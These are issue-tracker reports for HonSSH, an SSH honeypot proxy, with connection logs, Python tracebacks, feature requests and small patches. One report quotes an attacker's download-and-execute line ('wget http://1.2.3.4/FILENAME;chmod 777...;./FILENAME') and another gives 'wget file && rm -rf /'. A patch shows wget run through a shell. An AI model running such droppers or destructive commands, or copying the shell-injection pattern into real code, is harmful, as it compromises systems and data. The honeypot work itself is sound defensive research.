<honssh.client.HonsshClientFactory instance at 0x2472b48>

# -- Making a connection to the honeypot
#
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory]  CONNECTION_MADE 
20140516_190927 11.22.33.44 40181
2014-05-16 19:09:27+0200 [Uninitialized] New client connection
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key 
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] outgoing: 
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] incoming: 
aes128-ctr hmac-md5 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] kex alg, key alg: 
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] outgoing: aes256-ctr 
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] incoming: aes256-ctr 
hmac-sha1 none
2014-05-16 19:09:27+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:09:27+0200 [HonsshClientTransport,client] Client Connection 
Secured
2014-05-16 19:09:28+0200 [HonsshClientTransport,client] Detected Public Key 
authentication - disabling
2014-05-16 19:09:32+0200 [HonsshClientTransport,client]  LOGIN_SUCCESSFUL 
20140516_190932 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44] Entered command: 
w
2014-05-16 19:09:34+0200 [HonsshServerTransport,0,11.22.33.44]  COMMAND_ENTERED 
20140516_190934 11.22.33.44 w

# -- Output from 'w'
#
$ w
 19:09:50 up 4 days, 19:23,  2 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
hostmast pts/0    192.168.192.168   19:09    1.00s  0.23s  0.00s w

2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Entered command: 
exit
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44]  COMMAND_ENTERED 
20140516_190943 11.22.33.44 exit
2014-05-16 19:09:43+0200 [HonsshClientTransport,client] Disconnect received 
from the honeypot: 192.168.192.16854
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect 
received from the attacker: 11.22.33.44
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting 
with error, code 10
    reason: user closed connection
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:09:43+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection 
with the attacker: 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshServerTransport,0,11.22.33.44]  CONNECTION_LOST 
20140516_190944 11.22.33.44
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] connection lost
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Lost connection with 
the honeypot: 192.168.192.16854
2014-05-16 19:09:44+0200 [HonsshClientTransport,client] Stopping factory 
<honssh.client.HonsshClientFactory instance at 0x2472b48>

# -- Stopping HonSSH.
#
2014-05-16 19:10:41+0200 [-] Received SIGTERM, shutting down.
2014-05-16 19:10:41+0200 [-] (TCP Port 22 Closed)
2014-05-16 19:10:41+0200 [-] Stopping factory 
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:10:41+0200 [-] Main loop terminated.
2014-05-16 19:10:41+0200 [-] Server Shut Down.

# -- Changing 'enabled = false' to 'enabled = true'
#
2014-05-16 19:10:43+0200 [-] Log opened.
2014-05-16 19:10:43+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:10:43+0200 [-] reactor class: 
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:10:43+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:10:43+0200 [-] Starting factory 
<honssh.server.HonsshServerFactory instance at 0x14e8f80>
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] 
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Disconnecting with 
error, code 10
    reason: user closed connection
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:10:43+0200 [HonsshSlimClientTransport,client] Stopping factory 
<honssh.client.HonsshSlimClientFactory instance at 0x14e8f38>
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] disabling 
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] HonSSH Interface 
created

# -- First error
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Error adding IP 
address to HonSSH Interface - Using client_addr: Error: an inet prefix is 
expected rather than "11.22.33.45/32".
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory] Starting factory 
<honssh.client.HonsshClientFactory instance at 0x14e6b48>

# -- Making a connection to the honeypot
#
2014-05-16 19:10:47+0200 [honssh.server.HonsshServerFactory]  CONNECTION_MADE 
20140516_191047 11.22.33.44 46251
2014-05-16 19:10:47+0200 [Uninitialized] New client connection
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] kex alg, key 
alg: diffie-hellman-group1-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] outgoing: 
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] incoming: 
aes128-ctr hmac-md5 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] kex alg, key alg: 
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] outgoing: aes256-ctr 
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] incoming: aes256-ctr 
hmac-sha1 none
2014-05-16 19:10:47+0200 [HonsshServerTransport,0,11.22.33.44] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] REVERSE
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] NEW KEYS
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Client Connection 
Secured
2014-05-16 19:10:47+0200 [HonsshClientTransport,client] Detected Public Key 
authentication - disabling
2014-05-16 19:10:52+0200 [HonsshClientTransport,client]  LOGIN_SUCCESSFUL 
20140516_191052 11.22.33.44 hostmaster Hosting2014
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44] Entered command: 
w
2014-05-16 19:10:54+0200 [HonsshServerTransport,0,11.22.33.44]  COMMAND_ENTERED 
20140516_191054 11.22.33.44 w

# -- Output from 'w'
#
$ w
 19:11:11 up 4 days, 19:25,  2 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
hostmast pts/0    192.168.192.168   19:11    2.00s  0.24s  0.00s w

2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Entered command: 
exit
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44]  COMMAND_ENTERED 
20140516_191126 11.22.33.44 exit
2014-05-16 19:11:26+0200 [HonsshClientTransport,client] Disconnect received 
from the honeypot: 192.168.192.16854
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnect 
received from the attacker: 11.22.33.44
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Disconnecting 
with error, code 10
    reason: user closed connection
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] connection lost
2014-05-16 19:11:26+0200 [HonsshServerTransport,0,11.22.33.44] Lost connection 
with the attacker: 11.22.33.44
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44]  CONNECTION_LOST 
20140516_191128 11.22.33.44

# -- Second error
#
2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing 
IP address to HonSSH Interface: Error: an inet prefix is expected rather than 
"11.22.33.45/32".

2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing 
POSTROUTING Rule: iptables v1.4.12: host/network `11.22.33.45' not found
    Try `iptables -h' or 'iptables --help' for more information.

2014-05-16 19:11:28+0200 [HonsshServerTransport,0,11.22.33.44] Error removing 
PREROUTING Rule: iptables v1.4.12: Bad IP address "11.22.33.45"

    Try `iptables -h' or 'iptables --help' for more information.

Original issue reported on code.google.com by [email protected] on 16 May 2014 at 5:40

Message Code 95 misses first 4

What steps will reproduce the problem?
1.
2.
3.

What is the expected output? What do you see instead?


What version of the product are you using? On what operating system?


Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 3 Mar 2014 at 8:23

Not downloading wget files if filename is followed by a ';'

If the attacker logon to the honeypot and downloads a file using a "copy paste 
command" containing semicolon directly after the file name it will not be 
downloaded by HonSSH

Example command:
wget http://1.2.3.4/FILENAME;chmod 777 FILENAME;./FILENAME;rm -rf FILENAME;


What version of the product are you using?
81dafaef5630

On what operating system?
Ubuntu 12.04 LTS

Original issue reported on code.google.com by [email protected] on 17 Feb 2014 at 5:27

Email after login

Add an option to email after every successful login.

ETA: April 5th

Original issue reported on code.google.com by [email protected] on 30 Mar 2014 at 5:21

Unhandled Error:

What steps will reproduce the problem?
Not quite sure, it appears to be intermittent.
Its occurring during connections from different attackers but, not on every 
connection. The only common denominator is that all of the instances where this 
occurs, the attack is coming from a Chinese based IP address.

What is the expected output?
Not seeing these errors? :P

What do you see instead?
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
        return callWithContext({"system": lp}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
        return func(*args,**kw)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 586, in _doReadOrWrite
        why = selectable.doRead()
      File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 199, in doRead
        rval = self.protocol.dataReceived(data)
      File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
        self.dispatchMessage(messageNum, packet[1:])
      File "/opt/honssh/honssh/server.py", line 216, in dispatchMessage
        self.client.sendPacket(messageNum, payload)
    exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'


What version of the product are you using?
46d8a98155cc

On what operating system?
Ubuntu server 12.04


Please provide any additional information below.
I've added a log file containing all the errors.
I might be wrong but, i think we saw this error before?
Left me know if you want the adv-logs as well.

//Are

Original issue reported on code.google.com by [email protected] on 10 Aug 2014 at 1:15

Take #2: "Issue 20: Exception caught"

What steps will reproduce the problem?
And so...it returns :)

What is the expected output?
Normal log entries(?)

What do you see instead?
2014-03-21 12:41:37+0100 [honssh.server.HonsshServerFactory] Starting factory 
<honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>
2014-03-21 12:41:37+0100 [HonsshServerTransport,218,193.17.184.197] Unhandled 
Error
        Traceback (most recent call last):
          File "/usr/local/lib/python2.7/site-packages/twisted/application/app.py", line 323, in runReactorWithLogging
            reactor.run()
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
            self.mainLoop()
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1181, in mainLoop
            self.doIteration(t)
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/pollreactor.py", line 167, in doPoll
            log.callWithLogger(selectable, _drdw, selectable, fd, event)
        --- <exception caught here> ---
          File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
            return callWithContext({"system": lp}, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
            return context.call({ILogContext: newCtx}, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
            return self.currentContext().callWithContext(ctx, func, *args, **kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
            return func(*args,**kw)
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 594, in _doReadOrWrite
            self._disconnectSelectable(selectable, why, inRead)
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
            selectable.readConnectionLost(f)
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
            self.connectionLost(reason)
          File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 277, in connectionLost
            protocol.connectionLost(reason)
          File "/HONEY/honssh/server.py", line 73, in connectionLost
            self.client.loseConnection()
        exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'

2014-03-21 12:41:37+0100 [Uninitialized] New client connection
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] kex alg, key alg: 
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] outgoing: aes256-ctr 
hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] incoming: aes256-ctr 
hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] REVERSE
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] Client Connection 
Secured
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] connection lost
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] Stopping factory 
<honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>

What version of the product are you using?
56dfab7e24f1    

On what operating system?
OpenBSD 5.3/5.4 amd64

Please provide any additional information below
I have advanced logging enabled this time, but this incident did not generate 
any logs at all.
The log snippet i included here is the only data i can provide you with - sorry.

Original issue reported on code.google.com by [email protected] on 21 Mar 2014 at 11:58

file_download wget functionality flawed

Currently the file download option will look for commands containing "wget" and 
run them on the HonSSH box. This is too greedy and needs to only extract the 
http link.

e.g. wget file && rm -rf /   Would be bad.

This will be fixed shortly. Until then, use file_download = false.

Original issue reported on code.google.com by [email protected] on 16 Feb 2014 at 11:58

No option 'file_download' in section: 'extras'

What steps will reproduce the problem?
1.
Cloned honssh to server

2.
Started honssh using start.sh

3.
Testing to login in to honeypot. Was able to log in but when issuing any
commands, such as 'ls', the connection is closed.

What is the expected output?
The expected output, on the client side, would be the result of the command 
executed on the server.
The expected output, on the server side (honssh), would be the executed 
commands being populated in the current honssh.log.

What do you see instead?
- On the client side:

root:~# lsConnection to 11.22.33.44 closed by remote host.
Connection to 11.22.33.44 closed.

- On the server side, in honssh.log

2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
        return callWithContext({"system": lp}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
        return func(*args,**kw)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
        why = selectable.doRead()
      File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
        return self._dataReceived(data)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
        rval = self.protocol.dataReceived(data)
      File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
        self.dispatchMessage(messageNum, packet[1:])
      File "/home/loke/honssh/honssh/server.py", line 131, in dispatchMessage
        if self.cfg.get('extras', 'file_download') == 'true':
      File "/usr/lib/python2.7/ConfigParser.py", line 618, in get
        raise NoOptionError(option, section)
    ConfigParser.NoOptionError: No option 'file_download' in section: 'extras'

2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] connection lost

What version of the product are you using?
Rev 7ceb089043af

On what operating system?
Ubuntu 13.10 

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 15 Feb 2014 at 2:23

wget url1 url2

Only downloads url2

Original issue reported on code.google.com by [email protected] on 8 Jun 2014 at 1:15

Better logging on command when arrow keys are used (left + right)

Currently logs look like this when arrow keys are pressed:
Entered command: wget 
google.com\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[D\x1b[Dhttp://

Need to support all arrow keys not just up.

ETA: April 5th

Original issue reported on code.google.com by [email protected] on 30 Mar 2014 at 5:23

Reverse-SSH-Connections do not get logged

It looks like if an attacker creates a reverse SSH-Connection this does not get 
intercepted and the reverse connection request is send to the honeypot 
ssh-server.

Original issue reported on code.google.com by [email protected] on 28 Feb 2014 at 7:48

Not Running

Starting honssh in background...2013-09-30 21:36:52+0800 [-] Log opened.
2013-09-30 21:36:52+0800 [-] Traceback (most recent call last):
2013-09-30 21:36:52+0800 [-]   File 
"/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in 
getApplication
2013-09-30 21:36:52+0800 [-]     application = 
service.loadApplication(filename, style, passphrase)
2013-09-30 21:36:52+0800 [-]   File 
"/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in 
loadApplication
2013-09-30 21:36:52+0800 [-]     application = sob.loadValueFromFile(filename, 
'application', passphrase)
2013-09-30 21:36:52+0800 [-]   File 
"/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in 
loadValueFromFile
2013-09-30 21:36:52+0800 [-]     exec fileObj in d, d
2013-09-30 21:36:52+0800 [-]   File "honssh.tac", line 53, in <module>
2013-09-30 21:36:52+0800 [-]     with open(cfg.get('honeypot', 'private_key')) 
as privateBlobFile:
2013-09-30 21:36:52+0800 [-] IOError: [Errno 2] No such file or directory: 
'id_rsa'
2013-09-30 21:36:52+0800 [-] Failed to load application: [Errno 2] No such file 
or directory: 'id_rsa'
2013-09-30 21:36:52+0800 [-] Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 652, in run
        runApp(config)
      File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 23, in runApp
        _SomeApplicationRunner(config).run()
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 386, in run
        self.application = self.createOrGetApplication()
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 451, in createOrGetApplication
        application = getApplication(self.config, passphrase)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in getApplication
        application = service.loadApplication(filename, style, passphrase)
      File "/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in loadApplication
        application = sob.loadValueFromFile(filename, 'application', passphrase)
      File "/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in loadValueFromFile
        exec fileObj in d, d
      File "honssh.tac", line 53, in <module>
        with open(cfg.get('honeypot', 'private_key')) as privateBlobFile:
    exceptions.IOError: [Errno 2] No such file or directory: 'id_rsa'


Failed to load application: [Errno 2] No such file or directory: 'id_rsa'



in ubuntu 12.04

Original issue reported on code.google.com by [email protected] on 30 Sep 2013 at 1:37

ELK Output

:)

Original issue reported on code.google.com by [email protected] on 14 Sep 2014 at 5:50

[no issue]

What steps will reproduce the problem?
There is no issue, its a question/request :)

What is the expected output?
n/a

What do you see instead?
n/a

What version of the product are you using?
Latest

On what operating system?
OpenBSD 5.4

Please provide any additional information below.
Sorry to be submitting a ticket for this, its not really an issue with HonSSH 
itself, but i do have a few questions and a feature request. I apologize in 
advance if you do not handle this type of submits.

-----------------------------

Feature requests: 

1)
When HonSSH downloads a file its stored in the 'downloads' directory.
In 'honssh/server.py' it will first check if 'downloads' exists and create it 
if False. My suggestion is to separate the downloaded files by dates.

Example:
downloads/2014.02.15_malware
downloads/2014.02.22_malware
downloads/2014.02.23_malware

Instead of just testing for the 'downloads' directory i would like to test for 
'downloads/YYYY.mm.dd_malware' instead.

2)
Using dates in files.
Some of the files that HonSSH create (tty logs) contain spaces and semicolons. 
Would you be willing to change the format of this to something like 
'YYYY.mm.dd_HHMMSS'?


-----------------------------


It's not really a big issue, but i basically have to edit the source each time 
you release a new version - yes, i might be a bit lazy :P


-----------------------------


Questions:
I'm going deploy a large scale honey net (+100 nodes) and HonSSH will be the 
'bread and butter' of this deployment and i have a few questions about what 
HonSSH is capable of doing.


The general layout of the honey net will look like this

- Topology:
INTERNETZ ====== HONSSH ===== LARGE SCALE HONEYNET


HonSSH will be used on a OpenBSD firewall/NAT device (physical hardware) with 
its external network interface connected directly to the network of our ISP and 
will be assigned its IP address trough DHCP.


In 'honssh.cfg' i have to define the IP address of the external network card 
(ssh_addr), this might be a slight issue as its assigned by DHCP (ISP assigns a 
new one each 8 - 15 days). Would it be possible to use a FQDN (DDNS) instead of 
an IP address here? If not, do you have any suggestions to solve this? 


-----------------------------


Again, sorry if this falls outside the scope of your tickets.

HonSSH is the most promising project in the realm of high interaction honeypot 
solutions i've seen since....well...basically ever, many thanks for your work 
on this.


Kind regards,

B.September

Original issue reported on code.google.com by [email protected] on 23 Feb 2014 at 4:05

How to work e-mail alerting?

Hello. Can you help me with e-mail alerting feature please? I have activated 
this feature in config file. And I have entered data about my SMTP server and 
mail account too. But after SSH login e-mail does not send. honssh.log does not 
contain any informations about this failure. I use version 1.2.2 and Debian 7.4.

Thank you for replies.

Original issue reported on code.google.com by [email protected] on 27 Mar 2014 at 10:19

Enhancment request: Logging of downloaded files

HonSSH is already registering the downloaded files in the honssh.log.
Its not a great inconvenience doing some scripted taks to extract them from 
those files, but it would be awesome to get them in a separate log file if 
possible.

Maybe the log could have a format like this or similar?
2014-06-01 20:51:32, http://1.1.1.1/bacdoor, Size: 251Kb, MD5 hash: 
42d1eea045ed9a267041a64d2f4f1b53, sessions/2.3.4.5/downloads/bacdoor

This would also help with submitting the hash to virustotal abd also seeing if 
the attackers pull the same versions of malware.

Original issue reported on code.google.com by [email protected] on 1 Jun 2014 at 7:01

Non-technical: cosmetic adjustment

Hi Thomas!

This is not really an issue, its more of a cosmetic adjustment request :)

When I receive a mail saying something like this,
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 - 
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username:[USER] Password:[PASSWORD]
"""
it would be nice to separate the 'Username:' and  '[USER]' with a whitespace.

I.E:
"""
2014-07-30 01:36:49 - Incoming connection from: 1.2.3.4:46286 - 
SSH-2.0-libssh-0.1
2014-07-30 01:36:49 - Successful login - Username: [USER] Password: [PASSWORD]
"""

This would make it a bit more readable.

....Yes, i know i'm crazy picky about these things :P
If you fix it - awesome! If you don't - awesome!


Cheers,

Are

Original issue reported on code.google.com by [email protected] on 30 Jul 2014 at 8:39

TTY log not sent unless one command were executed.

What steps will reproduce the problem?
1.
The attacker logs in to verify the user/passwd combination and disconnects 
immediately. (Possibly ctrl+d)

What is the expected behavior?
When HonSSH detects a new TTY log it should be sent using the mail function.

What behavior do you see instead?
The absence of these logs being sent.

What version of the product are you using?
56dfab7e24f1

On what operating system?
OpenBSD 5.3 amd64/5.4 amd64

Please provide any additional information below.
Dont know if this is working as intended.
Its not really a big issue whether or not i receive empty TTY logs :)
It looks to be working as long as the attacker enters at least one command.

Cheers,
B

Original issue reported on code.google.com by [email protected] on 19 Mar 2014 at 5:49

Attachments:

tty_log_not_sent.tar.gz

exceptions.IOError: [Errno 2] No such file or directory: 'sessions/1.2.3.4/20140603_121316.log'

What steps will reproduce the problem?

1. When.
During a failed bruteforce attack

2. How to reproduce.
Attempt to login with wrong credentials

What is the expected output?
A honssh.log without any error messages.

What do you see instead?
After the attacker has failed to authenticate and disconnects, you will see 
this error in the honssh.log:

"""
2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] [OUTPUT] Lost 
connection with the attacker: 1.2.3.4
2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 323, in runReactorWithLogging
        reactor.run()
      File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
        self.mainLoop()
      File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
        self.doIteration(t)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
        log.callWithLogger(selectable, _drdw, selectable, fd, event)
    --- <exception caught here> ---
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
        return callWithContext({"system": lp}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
        return func(*args,**kw)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 599, in _doReadOrWrite
        self._disconnectSelectable(selectable, why, inRead)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
        selectable.readConnectionLost(f)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
        self.connectionLost(reason)
      File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 277, in connectionLost
        protocol.connectionLost(reason)
      File "/opt/honssh/honssh/server.py", line 82, in connectionLost
        self.out.connectionLost()
      File "/opt/honssh/honssh/output.py", line 82, in connectionLost
        self.email('HonSSH - Attack logged', self.txtlog_file)
      File "/opt/honssh/honssh/output.py", line 241, in email
        fp = open(self.txtlog_file, 'rb')
    exceptions.IOError: [Errno 2] No such file or directory: 'sessions/1.2.3.4/20140603_121316.log'

2014-06-03 12:13:35+0200 [HonsshClientTransport,client] connection lost
"""

What version of the product are you using?
26d635886db9

On what operating system?
Ubuntu 12.04 LTS

Please provide any additional information below.
I remember we spoke about changing the logs that were generated, could it be 
that 'sessions/1.2.3.4/20140603_121316.log' is a non-existing log file name?

Original issue reported on code.google.com by [email protected] on 3 Jun 2014 at 10:23

Multiple channel handling

HonSSH does not currently support two simultaneous channels over one connection 
e.g. terminal and sftp

Original issue reported on code.google.com by [email protected] on 15 Jun 2014 at 5:25

Database logging

Include the ability to log data to an SQL database, like Kippo.

ETA: ???

Original issue reported on code.google.com by [email protected] on 30 Mar 2014 at 5:32

Commands in session log

There is a problem with backslashes in the session command log files. Under 
investigation.

Original issue reported on code.google.com by [email protected] on 13 Aug 2013 at 8:15

Enhancement: Option to enable logging of all messages

Just a little enhancement idea: add an option to the .cfg to log all 
SSH-messages and not only the unknown, like you accidentially did in client.py 
in commit 8c6edd0779f4

Original issue reported on code.google.com by [email protected] on 1 Mar 2014 at 6:09

Permissions on 'requirements'

This ticket is only created as a quick reminder for you.

The file 'honssh/requirements' has been pushed with 0755 permissions, maybe it 
should be 0644 instead?

Original issue reported on code.google.com by bifrozt.development on 8 Jun 2014 at 11:46

Working with multiple honeypots behind honssh

Hi, 

This is not a problem, just a request for advice.
What would be my best option to work with multiple honeypots behind one honssh 
gateway? Can I enter several IP addresses in the honssh config file ?

Thank you.

Original issue reported on code.google.com by [email protected] on 4 Nov 2014 at 11:35

disabling smtp auth

Hi, I use local mail server and I don't have smtp auth enabled. Currently, 
there is no way to make email sendings without smtp auth (kippo validates 
existence of username and password variables) , so I introduced new variable 
ust_smtpauth to honssh.cfg and did small change. I also fixed small typo in 
email exception handling.

--- output.py.orig  2014-06-20 10:04:35.000000000 +0200
+++ output.py   2014-06-20 10:17:24.000000000 +0200
@@ -269,11 +269,12 @@
                 s.ehlo()
                 if self.cfg.get('email', 'use_tls') == 'true':
                     s.starttls()
-                s.login(self.cfg.get('email', 'username'), 
self.cfg.get('email', 'password'))
+                if (self.cfg.get('email', 'use_smtpauth')):
+                    s.login(self.cfg.get('email', 'username'), 
self.cfg.get('email', 'password'))
             s.sendmail(msg['From'], msg['To'].split(','), msg.as_string())
             s.quit() #End send mail code
         except Exception, ex:
-            log.msg('[OUTPUT][EMAIL][ERR] - ' + str(e))
+            log.msg('[OUTPUT][EMAIL][ERR] - ' + str(ex))

     def wget(self, wgetCommand, link, fileOut):
         sp = subprocess.Popen(wgetCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

Cheers,
Pawel

Original issue reported on code.google.com by [email protected] on 20 Jun 2014 at 8:27

Enh./Patch - Send mail with ttylog

I have written a small addition to send a mail, after an attacker was logged 
which includes the ttylog. Maybe you are interested.

client.py:
.....
           elif messageNum == 97:
                if self.factory.server.isPty:
                    ttylog.ttylog_close(self.ttylog_file, time.time())
                    if self.factory.server.cfg.get('mail', 'enable') == 'true':
                        msg = MIMEMultipart()
                        msg['Subject'] = 'Attacker logged'
                        msg['From'] = self.factory.server.cfg.get('mail', 'from')
                        msg['To'] = self.factory.server.cfg.get('mail', 'to')
                        msg.preamble = 'An attacker was logged'
